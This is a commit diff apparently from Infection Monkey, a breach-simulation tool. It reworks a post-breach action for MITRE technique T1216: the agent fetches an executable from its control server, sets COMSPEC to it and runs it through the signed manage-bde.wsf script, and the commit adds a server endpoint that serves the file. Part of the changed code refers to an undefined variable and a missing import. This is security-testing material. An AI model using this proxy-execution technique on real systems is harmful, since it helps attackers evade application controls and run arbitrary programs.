Code review changes
- smaller executable file; fetches it from the island when pba needs to run - technique configured off by default - other implementation changes
This commit is contained in:
parent
59f9752faf
commit
4b664031af
|
@ -325,6 +325,16 @@ class ControlClient(object):
|
||||||
except requests.exceptions.RequestException:
|
except requests.exceptions.RequestException:
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
@staticmethod
|
||||||
|
def get_T1216_pba_file():
|
||||||
|
try:
|
||||||
|
return requests.get("https://%s/api/t1216-pba/download/" % WormConfiguration.current_server, # noqa: DUO123
|
||||||
|
verify=False,
|
||||||
|
proxies=ControlClient.proxies,
|
||||||
|
stream=True)
|
||||||
|
except requests.exceptions.RequestException:
|
||||||
|
return False
|
||||||
|
|
||||||
@staticmethod
|
@staticmethod
|
||||||
def should_monkey_run(vulnerable_port: str) -> bool:
|
def should_monkey_run(vulnerable_port: str) -> bool:
|
||||||
if vulnerable_port and \
|
if vulnerable_port and \
|
||||||
|
|
|
@ -1,7 +1,10 @@
|
||||||
|
import subprocess
|
||||||
|
|
||||||
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
from common.data.post_breach_consts import POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC
|
||||||
from infection_monkey.post_breach.pba import PBA
|
from infection_monkey.post_breach.pba import PBA
|
||||||
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
|
from infection_monkey.post_breach.signed_script_proxy.signed_script_proxy import (
|
||||||
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
cleanup_changes, get_commands_to_proxy_execution_using_signed_script)
|
||||||
|
from infection_monkey.utils.environment import is_windows_os
|
||||||
|
|
||||||
|
|
||||||
class SignedScriptProxyExecution(PBA):
|
class SignedScriptProxyExecution(PBA):
|
||||||
|
@ -10,4 +13,12 @@ class SignedScriptProxyExecution(PBA):
|
||||||
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
|
super().__init__(POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC,
|
||||||
windows_cmd=' '.join(windows_cmds))
|
windows_cmd=' '.join(windows_cmds))
|
||||||
|
|
||||||
cleanup_changes()
|
def run(self):
|
||||||
|
original_comspec = ''
|
||||||
|
if is_windows_os():
|
||||||
|
original_comspec =\
|
||||||
|
subprocess.check_output('if defined COMSPEC echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
||||||
|
|
||||||
|
super().run()
|
||||||
|
|
||||||
|
cleanup_changes(original_comspec)
|
||||||
|
|
|
@ -11,6 +11,6 @@ def get_commands_to_proxy_execution_using_signed_script():
|
||||||
return windows_cmds
|
return windows_cmds
|
||||||
|
|
||||||
|
|
||||||
def cleanup_changes():
|
def cleanup_changes(original_comspec):
|
||||||
if is_windows_os():
|
if is_windows_os():
|
||||||
subprocess.run(get_windows_commands_to_reset_comspec(), shell=True) # noqa: DUO116
|
subprocess.run(get_windows_commands_to_reset_comspec(original_comspec), shell=True) # noqa: DUO116
|
||||||
|
|
Binary file not shown.
|
@ -1,16 +1,25 @@
|
||||||
import subprocess
|
import subprocess
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
ORIGINAL_COMSPEC = r'C:\Windows\System32\cmd.exe'
|
from infection_monkey.control import ControlClient
|
||||||
|
|
||||||
|
|
||||||
def get_windows_commands_to_proxy_execution_using_signed_script():
|
def get_windows_commands_to_proxy_execution_using_signed_script():
|
||||||
global ORIGINAL_COMSPEC
|
# temp_comspec_path = ['infection_monkey', 'post_breach', 'signed_script_proxy', 'windows', 'random_executable.exe']
|
||||||
ORIGINAL_COMSPEC = subprocess.check_output('echo %COMSPEC%', shell=True).decode() # noqa: DUO116
|
# temp_comspec = Path(*temp_comspec_path)
|
||||||
|
with ControlClient.get_T1216_pba_file() as r:
|
||||||
|
with open(temp_comspec, 'wb') as f:
|
||||||
|
shutil.copyfileobj(r.raw, f)
|
||||||
|
|
||||||
|
windir_path = subprocess.check_output('echo %WINDIR%', shell=True).decode().strip('\r\n') # noqa: DUO116
|
||||||
|
signed_script_path = [windir_path, 'System32', 'manage-bde.wsf']
|
||||||
|
signed_script = Path(*signed_script_path)
|
||||||
|
|
||||||
return [
|
return [
|
||||||
r'set comspec=infection_monkey\post_breach\signed_script_proxy\windows\random_executable.exe &&',
|
f'set comspec={temp_comspec} &&',
|
||||||
r'cscript C:\Windows\System32\manage-bde.wsf'
|
f'cscript {signed_script}'
|
||||||
]
|
]
|
||||||
|
|
||||||
|
|
||||||
def get_windows_commands_to_reset_comspec():
|
def get_windows_commands_to_reset_comspec(original_comspec):
|
||||||
return f'set comspec={ORIGINAL_COMSPEC}'
|
return f'set comspec={original_comspec}'
|
||||||
|
|
|
@ -35,6 +35,8 @@ from monkey_island.cc.resources.pba_file_upload import FileUpload
|
||||||
from monkey_island.cc.resources.remote_run import RemoteRun
|
from monkey_island.cc.resources.remote_run import RemoteRun
|
||||||
from monkey_island.cc.resources.reporting.report import Report
|
from monkey_island.cc.resources.reporting.report import Report
|
||||||
from monkey_island.cc.resources.root import Root
|
from monkey_island.cc.resources.root import Root
|
||||||
|
from monkey_island.cc.resources.T1216_pba_file_download import \
|
||||||
|
T1216PBAFileDownload
|
||||||
from monkey_island.cc.resources.telemetry import Telemetry
|
from monkey_island.cc.resources.telemetry import Telemetry
|
||||||
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
from monkey_island.cc.resources.telemetry_feed import TelemetryFeed
|
||||||
from monkey_island.cc.resources.test.clear_caches import ClearCaches
|
from monkey_island.cc.resources.test.clear_caches import ClearCaches
|
||||||
|
@ -130,6 +132,7 @@ def init_api_resources(api):
|
||||||
api.add_resource(Log, '/api/log', '/api/log/')
|
api.add_resource(Log, '/api/log', '/api/log/')
|
||||||
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
api.add_resource(IslandLog, '/api/log/island/download', '/api/log/island/download/')
|
||||||
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
api.add_resource(PBAFileDownload, '/api/pba/download/<string:path>')
|
||||||
|
api.add_resource(T1216PBAFileDownload, '/api/t1216-pba/download/')
|
||||||
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
api.add_resource(FileUpload, '/api/fileUpload/<string:file_type>',
|
||||||
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
'/api/fileUpload/<string:file_type>?load=<string:filename>',
|
||||||
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
'/api/fileUpload/<string:file_type>?restore=<string:filename>')
|
||||||
|
|
|
@ -0,0 +1,15 @@
|
||||||
|
from pathlib import Path
|
||||||
|
|
||||||
|
import flask_restful
|
||||||
|
from flask import send_from_directory
|
||||||
|
|
||||||
|
|
||||||
|
class T1216PBAFileDownload(flask_restful.Resource):
|
||||||
|
"""
|
||||||
|
File download endpoint used by monkey to download executable file for T1216 ("Signed Script Proxy Execution" PBA)
|
||||||
|
"""
|
||||||
|
|
||||||
|
def get(self):
|
||||||
|
executable_file_path = ['monkey_island', 'cc', 'resources', 'pba', 'T1216_random_executable.exe']
|
||||||
|
executable_file = Path(*executable_file_path)
|
||||||
|
return send_from_directory(executable_file)
|
Binary file not shown.
|
@ -189,7 +189,7 @@ SCHEMA = {
|
||||||
"T1216": {
|
"T1216": {
|
||||||
"title": "Signed script proxy execution",
|
"title": "Signed script proxy execution",
|
||||||
"type": "bool",
|
"type": "bool",
|
||||||
"value": True,
|
"value": False,
|
||||||
"necessary": False,
|
"necessary": False,
|
||||||
"link": "https://attack.mitre.org/techniques/T1216",
|
"link": "https://attack.mitre.org/techniques/T1216",
|
||||||
"description": "Adversaries may use scripts signed with trusted certificates to "
|
"description": "Adversaries may use scripts signed with trusted certificates to "
|
||||||
|
|
|
@ -7,9 +7,9 @@ __author__ = "shreyamalviya"
|
||||||
|
|
||||||
class T1216(PostBreachTechnique):
|
class T1216(PostBreachTechnique):
|
||||||
tech_id = "T1216"
|
tech_id = "T1216"
|
||||||
unscanned_msg = "Monkey didn't attempt to execute an arbitrary file with the help of a " +\
|
unscanned_msg = "Monkey didn't attempt to execute an arbitrary program with the help of a " +\
|
||||||
"pre-existing signed script since it didn't run on any Windows machines."
|
"pre-existing signed script since it didn't run on any Windows machines."
|
||||||
scanned_msg = "Monkey attempted to execute an arbitrary file with the help of a " +\
|
scanned_msg = "Monkey attempted to execute an arbitrary program with the help of a " +\
|
||||||
"pre-existing signed script on Windows but failed."
|
"pre-existing signed script on Windows but failed."
|
||||||
used_msg = "Monkey executed an arbitrary file with the help of a pre-existing signed script on Windows."
|
used_msg = "Monkey executed an arbitrary program with the help of a pre-existing signed script on Windows."
|
||||||
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
pba_names = [POST_BREACH_SIGNED_SCRIPT_PROXY_EXEC]
|
||||||
|
|
|
@ -67,8 +67,7 @@ MONKEY = {
|
||||||
"HiddenFiles",
|
"HiddenFiles",
|
||||||
"TrapCommand",
|
"TrapCommand",
|
||||||
"ChangeSetuidSetgid",
|
"ChangeSetuidSetgid",
|
||||||
"ScheduleJobs",
|
"ScheduleJobs"
|
||||||
"SignedScriptProxyExecution"
|
|
||||||
]
|
]
|
||||||
},
|
},
|
||||||
}
|
}
|
||||||
|
|
Loading…
Reference in New Issue